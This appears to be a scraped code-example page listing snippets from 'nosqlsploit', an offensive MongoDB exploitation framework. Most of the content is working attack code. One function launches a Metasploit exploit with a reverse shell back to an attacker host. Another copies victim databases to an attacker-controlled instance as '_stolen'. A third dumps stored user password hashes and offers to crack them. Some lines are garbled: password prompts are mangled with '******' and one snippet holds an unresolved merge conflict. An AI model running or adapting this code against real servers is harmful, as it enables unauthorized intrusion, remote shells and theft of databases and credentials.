예제 #1
0
 def setParam(self ,param ,value):
     '''set plugin par value'''
     param = param.upper()
     pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW)
     code  = 'global %s\n'%param
     code += '%s="%s"'%(param ,value)
     exec(code)
예제 #2
0
 def exploit(self):
     '''start exploit !!'''
     try:
         global exploitModule 
         exploitModule = exploitModule()
     except:
         pass
     pp.prettyPrint("[*] Start exploit.." ,YELLOW)
     plugin.exploit()
예제 #3
0
 def exploit(self):
     '''start exploit !!'''
     try:
         global exploitModule 
         exploitModule = exploitModule()
     except:
         pass
     pp.prettyPrint("[*] Start exploit.." ,YELLOW)
     plugin.exploit()
예제 #4
0
 def do_set(self,arg):
     args = arg.split(" ")
     if(len(args) == 2):
         param = args[0]
         value = args[1]
         if len(param) and len(value):
             res = self.pluginModule.checkParam(param)
             if res:
                 self.pluginModule.setParam(param ,value)
             else:
                 pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW)
     else:
         pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)
예제 #5
0
 def msfLaunch(self, RHOST, LHOST, LPORT):
     try:
         proc = subprocess.call(
             "msfcli exploit/linux/misc/mongod_native_helper RHOST=" +
             str(RHOST) +
             " DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" +
             str(LHOST) + " LPORT=" + str(LPORT) + " E",
             shell=True)
     except:
         pp.prettyPrint(
             "Something went wrong.  Make sure Metasploit is installed and path is set, and all options are defined.",
             RED)
         return
예제 #6
0
 def enumGrid (self,mongoConn):
     try:
         for dbItem in mongoConn.database_names():
             try:
                 db = mongoConn[dbItem]
                 fs = gridfs.GridFS(db)
                 files = fs.list()
                 pp.prettyPrint("GridFS enabled on database " + str(dbItem),GREEN)
                 pp.prettyPrint(" list of files:",GREEN)
                 pp.prettyPrint("\n".join(files),PURPLE)
             except:
                 pp.prettyPrint("GridFS not enabled on " + str(dbItem) + ".",RED)
     except:
         pp.prettyPrint("[!]Error:  Couldn't enumerate GridFS.  The provided credentials may not have rights.",RED)
     return
예제 #7
0
 def getPlatInfo(self, mongoConn):
     pp.prettyPrint("Mongodb Server Basic Info", GREEN)
     pp.prettyPrint(
         "MongoDB Version: " + mongoConn.server_info()['version'], PURPLE)
     pp.prettyPrint(
         "Debugs enabled : " + str(mongoConn.server_info()['debug']),
         PURPLE)
     pp.prettyPrint(
         "Platform: " + str(mongoConn.server_info()['bits']) + " bit",
         PURPLE)
     return
예제 #8
0
 def enumGrid(self, mongoConn):
     try:
         for dbItem in mongoConn.database_names():
             try:
                 db = mongoConn[dbItem]
                 fs = gridfs.GridFS(db)
                 files = fs.list()
                 pp.prettyPrint("GridFS enabled on database " + str(dbItem),
                                GREEN)
                 pp.prettyPrint(" list of files:", GREEN)
                 pp.prettyPrint("\n".join(files), PURPLE)
             except:
                 pp.prettyPrint(
                     "GridFS not enabled on " + str(dbItem) + ".", RED)
     except:
         pp.prettyPrint(
             "[!]Error:  Couldn't enumerate GridFS.  The provided credentials may not have rights.",
             RED)
     return
예제 #9
0
 def setParam(self ,param ,value):
     '''set plugin par value'''
     param = param.upper()
     if param == 'PAYLOAD':
         if value.upper() == "FALSE":
             code  = 'global PAYLOAD;PAYLOAD="false";'
             exec(code)
             pp.prettyPrint("[*] Disabled PAYLOAD !" ,YELLOW)
         elif self.checkPayload(value) == 'TRUE' and self.getOption("PAYLOAD") != "FALSE":
             pp.prettyPrint("[*] SET PAYLOAD=>%s"%value ,YELLOW)
             code  = 'global PAYLOAD\n'
             code += 'PAYLOAD="%s"'%value
             exec(code)
         else:
             pp.prettyPrint("[!] SET PAYLOAD FALSE !" ,RED)
     else:
         pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW)
         code  = 'global %s\n'%param
         code += '%s="%s"'%(param ,value)
         exec(code)
예제 #10
0
 def errmsg(self,msg):
     '''show error msg'''
     pp.prettyPrint("[!] Err:%s"%msg,RED)
예제 #11
0
 def mainExit(self):
     '''exit NSS'''
     pp.prettyPrint("\nBye ",RED)
     exit(0)
예제 #12
0
 def printLogo(self):
     '''print NSS logo..'''
     pp.prettyPrint(self.logo,GREY,0)
예제 #13
0
 def exeCMD(self,cmd):
     '''run system command'''
     pp.prettyPrint('[*] EXEC:%s'%cmd,RED)
     system(cmd)
예제 #14
0
 def stealDBs(self,LHOST,LPORT,RHOST,mongoConn):
     victim = RHOST
     localDbIp = LHOST
     localDbPort = int(LPORT)
     dbList = mongoConn.database_names()
     menuItem = 1
     if len(dbList) == 0:
         pp.prettyPrint("Can't get a list of databases to steal.  The provided credentials may not have rights.",YELLOW)
         return
     
     for dbName in dbList:
         pp.prettyPrint(str(menuItem) + "-" + dbName,GREEN)
         menuItem += 1
     
     try:
         dbLoot = raw_input("Select a database to steal:")
     except:
         pp.prettyPrint("[!]Invalid selection.",RED)
         stealDBs(myDB,mongoConn)
         
     try:
         #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
         dbNeedCreds = raw_input("Does this database require credentials (y/n)? ")
         if dbNeedCreds.lower() == "n":
             myDBConn = pymongo.MongoClient(localDbIp,localDbPort)
             myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim)	
         elif dbNeedCreds.lower() == "y":
             dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen",victim,dbUser,dbPass)
         else:
             pp.prettyPrint("[!]Invalid Selection.  Press enter to continue.",RED)
             stealDBs(myDB,mongoConn)
             
         cloneAnother = raw_input("Database cloned.  Copy another (y/n)? ")
         if cloneAnother.lower() == "y":
             self.stealDBs(myDB,mongoConn)
         else:
             return
     except:
         if str(sys.exc_info()).find('text search not enabled') != -1:
             pp.prettyPrint("Database copied, but text indexing was not enabled on the target.  Indexes not moved.",GREEN)
             return
         else:	
             pp.prettyPrint("[!]Something went wrong.  Are you sure your MongoDB is running and options are set?",RED)
             return
예제 #15
0
파일: tools.py 프로젝트: daige/nosqlsploit
    def mainHelp(self):
        '''show help'''
        pp.prettyPrint('NSS HELP MENU',YELLOW)
        pp.prettyPrint('=============',GREY)
        pp.prettyPrint('        COMMAND         DESCRIPTION',YELLOW)
        pp.prettyPrint('        -------         -----------',GREY,0)
        pp.prettyPrint('''
        help            Displays the help menu
        exit            Exit the NSS
        cls             Clear the screen
        show            List the plugins
        search          Search plugins
        use             Use the plugin''',CYAN)
        pp.prettyPrint('NSS HELP::SHOW',YELLOW)
        pp.prettyPrint('==============',GREY)
        pp.prettyPrint('        COMMAND         DESCRIPTION',YELLOW)
        pp.prettyPrint('        -------         -----------',GREY,0)
        pp.prettyPrint('''
        mongodb         List the mongodb plugins
<<<<<<< HEAD
=======
        multi           List the mongodb plugins
>>>>>>> 6f81fb7bb1cc81ab5062065b198e4e0b4b97e162
        all             List all the plugins''',CYAN)
예제 #16
0
 def showOptions(self):
     '''display plugin options'''
     pp.prettyPrint("\n",GREY)
     pp.prettyPrint("    PLUGIN OPTS" ,YELLOW)
     pp.prettyPrint("    ===========" ,GREY)
     pp.prettyPrint("        %-15s %-20s %-40s"%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW)
     pp.prettyPrint("        %-15s %-20s %-40s"%("-"*15 ,"-"*20 ,"-"*40) ,GREY)
     for opt in plugin.opts:
         param = opt[0]
         value = opt[1]
         desc = opt[2]
         pp.prettyPrint("        %-15s"%param ,CYAN ,0)
         pp.prettyPrint("%-20s"%value, PURPLE, 0)
         pp.prettyPrint("%-20s"%desc , GREEN)
     pp.prettyPrint("\n",GREY)
예제 #17
0
 def showUsage(tips):
     pp.prettyPrint('[?] USAGE:%s'%tips,YELLOW)
예제 #18
0
 def showOptions(self):
     '''display plugin options'''
     pp.prettyPrint("PLUGIN OPTS" ,YELLOW)
     pp.prettyPrint("===========" ,GREY)
     pp.prettyPrint("%-15s %-20s %-40s"%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW)
     pp.prettyPrint("%-15s %-20s %-40s"%("-"*15 ,"-"*20 ,"-"*40) ,GREY)
     for opt in plugin.opts:
         param = opt[0]
         value = opt[1]
         desc = opt[2]
         pp.prettyPrint("%-15s"%param ,CYAN ,0)
         exec('pp.prettyPrint("%-20s"%' + "%s"%param + ', PURPLE, 0)')
         pp.prettyPrint("%-40s"%desc ,GREEN)
     if self.checkPayload(PAYLOAD) == "TRUE":
         pp.prettyPrint("PAYLOAD OPTS" ,YELLOW)
         pp.prettyPrint("============" ,GREY)
         pp.prettyPrint("%-15s %-40s"%("PARAMETER" ,"DESCRIPTION") ,YELLOW)
         pp.prettyPrint("%-15s %-40s"%("-"*15 ,"-"*40) ,GREY)
         code = open("plugins/payload/" + PAYLOAD + ".py").read()
         exec(code)
         try:
             exec("global NSSPayload")
         except:
             pass
         for opt in NSSPayload.opts:
             param = opt[0]
             desc = opt[1]
             pp.prettyPrint("%-15s"%param ,CYAN ,0)
             pp.prettyPrint("%-40s"%desc ,PURPLE)
예제 #19
0
    def enumDbs(self, mongoConn):
        try:
            pp.prettyPrint("List of databases:", GREEN)
            pp.prettyPrint("\n".join(mongoConn.database_names()), PURPLE)
        except:
            pp.prettyPrint(
                "[!]Error:  Couldn't list databases.  The provided credentials may not have rights.",
                RED)

        pp.prettyPrint("List of collections:", GREEN)
        try:
            for dbItem in mongoConn.database_names():
                db = mongoConn[dbItem]
                pp.prettyPrint(dbItem + ":", CYAN)
                pp.prettyPrint("\n".join(db.collection_names()), PURPLE)
                if 'system.users' in db.collection_names():
                    users = list(db.system.users.find())
                    pp.prettyPrint("Database Users and Password Hashes:",
                                   GREEN)
                    for x in range(0, len(users)):
                        pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'], GREEN)
                        pp.prettyPrint("\n", GREEN)
                        crack = raw_input("Crack this hash (y/n)? ")
                        if crack.lower() == "y":
                            self.passCrack(users[x]['user'], users[x]['pwd'])
        except:
            pp.prettyPrint(
                "[!]Error:  Couldn't list collections.  The provided credentials may not have rights.",
                RED)
            return
예제 #20
0
 def info(self):
     '''display plugin infos'''
     pp.prettyPrint("PLUGIN INFOS" ,YELLOW)
     pp.prettyPrint("============" ,GREY)
     pp.prettyPrint("PARAMETER       VALUE" ,YELLOW)
     pp.prettyPrint("-"*15 + " " + "-"*20 ,GREY)
     for info in plugin.infos:
         param = info[0]
         value = info[1]
         pp.prettyPrint("%-15s"%param ,CYAN ,0)
         pp.prettyPrint("%-s"%value ,PURPLE)
예제 #21
0
 def pluginHelp(self):
     '''plugin help menu'''
     pp.prettyPrint('PLUGIN HELP MENU' ,YELLOW)
     pp.prettyPrint('================' ,GREY)
     pp.prettyPrint('        Command         Description' ,YELLOW)
     pp.prettyPrint('        -------         -----------' ,GREY ,0)
     pp.prettyPrint('''
     help            Displays the plugin menu
     exit            Back to NSS Main
     cls             Clear the screen
     info            Displays the plugin info
     show            Displays the plugin options
     set             Configure the plugin parameters
     exploit         Start plugin to exploit''' ,CYAN)
     pp.prettyPrint('PLUGIN SET HELP' ,YELLOW)
     pp.prettyPrint('===============' ,GREY)
     pp.prettyPrint('        Command         Description' ,YELLOW)
     pp.prettyPrint('        -------         -----------' ,GREY,0)
     pp.prettyPrint('''
     PAYLOAD         Set payload
     <PARAMETER>     Set parameter''' ,CYAN)
예제 #22
0
 def loadError(self,flag):
     if flag:
         pp.prettyPrint("[!] NO THIS PLUGIN !",RED)
     else:
         pp.prettyPrint("[!] IT'S A PAYLOAD !",RED)
예제 #23
0
 def start(self):
     pp.prettyPrint("[*] Start NSS ..",GREEN)
예제 #24
0
    def stealDBs(self, LHOST, LPORT, RHOST, mongoConn):
        victim = RHOST
        localDbIp = LHOST
        localDbPort = int(LPORT)
        dbList = mongoConn.database_names()
        menuItem = 1
        if len(dbList) == 0:
            pp.prettyPrint(
                "Can't get a list of databases to steal.  The provided credentials may not have rights.",
                YELLOW)
            return

        for dbName in dbList:
            pp.prettyPrint(str(menuItem) + "-" + dbName, GREEN)
            menuItem += 1

        try:
            dbLoot = raw_input("Select a database to steal:")
        except:
            pp.prettyPrint("[!]Invalid selection.", RED)
            stealDBs(myDB, mongoConn)

        try:
            #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
            dbNeedCreds = raw_input(
                "Does this database require credentials (y/n)? ")
            if dbNeedCreds.lower() == "n":
                myDBConn = pymongo.MongoClient(localDbIp, localDbPort)
                myDBConn.copy_database(dbList[int(dbLoot) - 1],
                                       dbList[int(dbLoot) - 1] + "_stolen",
                                       victim)
            elif dbNeedCreds.lower() == "y":
                dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen",
                                       victim, dbUser, dbPass)
            else:
                pp.prettyPrint(
                    "[!]Invalid Selection.  Press enter to continue.", RED)
                stealDBs(myDB, mongoConn)

            cloneAnother = raw_input("Database cloned.  Copy another (y/n)? ")
            if cloneAnother.lower() == "y":
                self.stealDBs(myDB, mongoConn)
            else:
                return
        except:
            if str(sys.exc_info()).find('text search not enabled') != -1:
                pp.prettyPrint(
                    "Database copied, but text indexing was not enabled on the target.  Indexes not moved.",
                    GREEN)
                return
            else:
                pp.prettyPrint(
                    "[!]Something went wrong.  Are you sure your MongoDB is running and options are set?",
                    RED)
                return
예제 #25
0
 def mainHelp(self):
     '''show help'''
     pp.prettyPrint("\n",GREY)
     pp.prettyPrint('    NSS HELP MENU',YELLOW)
     pp.prettyPrint('    =============',GREY)
     pp.prettyPrint('        COMMAND         DESCRIPTION',YELLOW)
     pp.prettyPrint('        -------         -----------',GREY,0)
     pp.prettyPrint('''
     help            Displays the help menu
     show            List the plugins
     search          Search plugins
     use             Use the plugin
     banner          Show the banner
     cls             Clear the screen
     exit            Exit the NSS''',CYAN)
     pp.prettyPrint("\n",GREY)
예제 #26
0
    def enumDbs (self,mongoConn):
        try:
            pp.prettyPrint("List of databases:",GREEN)
            pp.prettyPrint("\n".join(mongoConn.database_names()),PURPLE)
        except:
            pp.prettyPrint("[!]Error:  Couldn't list databases.  The provided credentials may not have rights.",RED)

        pp.prettyPrint("List of collections:",GREEN)
        try:
            for dbItem in mongoConn.database_names():
                db = mongoConn[dbItem]
                pp.prettyPrint(dbItem + ":",CYAN)
                pp.prettyPrint("\n".join(db.collection_names()),PURPLE)
                if 'system.users' in db.collection_names():
                    users = list(db.system.users.find())
                    pp.prettyPrint("Database Users and Password Hashes:",GREEN)
                    for x in range (0,len(users)):
                        pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'],GREEN)
                        pp.prettyPrint("\n",GREEN)
                        crack = raw_input("Crack this hash (y/n)? ")
                        if crack.lower() == "y":
                            self.passCrack(users[x]['user'],users[x]['pwd'])
        except:
            pp.prettyPrint("[!]Error:  Couldn't list collections.  The provided credentials may not have rights.",RED)
            return
예제 #27
0
 def loadError(self):
     pp.prettyPrint("[!] NO THIS PLUGIN !",RED)
예제 #28
0
 def msfLaunch(self,RHOST,LHOST,LPORT):			
     try:
         proc = subprocess.call("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str(RHOST) +" DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str(LHOST) + " LPORT="+ str(LPORT) + " E", shell=True)
     except:
         pp.prettyPrint("Something went wrong.  Make sure Metasploit is installed and path is set, and all options are defined.",RED)
         return
예제 #29
0
 def pluginHelp(self):
     '''plugin help menu'''
     pp.prettyPrint("\n",GREY)
     pp.prettyPrint('   PLUGIN HELP MENU' ,YELLOW)
     pp.prettyPrint('   ================' ,GREY)
     pp.prettyPrint('        Command         Description' ,YELLOW)
     pp.prettyPrint('        -------         -----------' ,GREY ,0)
     pp.prettyPrint('''
     help            Displays the plugin menu
     info            Displays the plugin info
     show            Displays the plugin options
     set             Configure the plugin parameters
     exploit         Exploit the target
     cls             Clear the screen
     back            Back to NSS Main''' ,CYAN)
     pp.prettyPrint('    PLUGIN SET HELP' ,YELLOW)
     pp.prettyPrint('    ===============' ,GREY)
     pp.prettyPrint('        Command         Description' ,YELLOW)
     pp.prettyPrint('        -------         -----------' ,GREY,0)
     pp.prettyPrint('''
     <PARAMETER>     Set parameter''' ,CYAN)
     pp.prettyPrint("\n",GREY)
예제 #30
0
 def getPlatInfo(self,mongoConn):
     pp.prettyPrint("Mongodb Server Basic Info",GREEN)
     pp.prettyPrint("MongoDB Version: " + mongoConn.server_info()['version'],PURPLE)
     pp.prettyPrint("Debugs enabled : " + str(mongoConn.server_info()['debug']),PURPLE)
     pp.prettyPrint("Platform: " + str(mongoConn.server_info()['bits']) + " bit",PURPLE)
     return
예제 #31
0
            if len(param) and len(value):
                res = self.pluginModule.checkParam(param)
                if res:
                    self.pluginModule.setParam(param ,value)
                else:
                    pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW)
        else:
            pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)

    def complete_set(self,text,line,begidx,endidx):
        USE_ARG = self.pluginModule.getOptions()
        if not text:
            completions = USE_ARG[:]
        else:
            completions = [i for i in USE_ARG if i.startswith(text.upper())]
        return completions

    def do_EOF(self):
        return True

    do_back = do_exit

if __name__ == '__main__':
    try:
        loads = loadPlugin(arg)
        loads.cmdloop()
    except KeyboardInterrupt:
        pp.prettyPrint("\n[!] CTRL+C EXIT !",RED)
    except Exception,e:
        pp.prettyPrint("[!] ERR:%s"%e,RED)
예제 #32
0
 def info(self):
     '''display plugin infos'''
     pp.prettyPrint("\n",GREY)
     pp.prettyPrint("    PLUGIN INFOS" ,YELLOW)
     pp.prettyPrint("    ============" ,GREY)
     pp.prettyPrint("        PARAMETER       VALUE" ,YELLOW)
     pp.prettyPrint("        "+"-"*15 + " " + "-"*20 ,GREY)
     for info in plugin.infos:
         param = info[0]
         value = info[1]
         pp.prettyPrint("        %-15s"%param ,CYAN ,0)
         pp.prettyPrint("%-s"%value ,PURPLE)
     pp.prettyPrint("\n",GREY)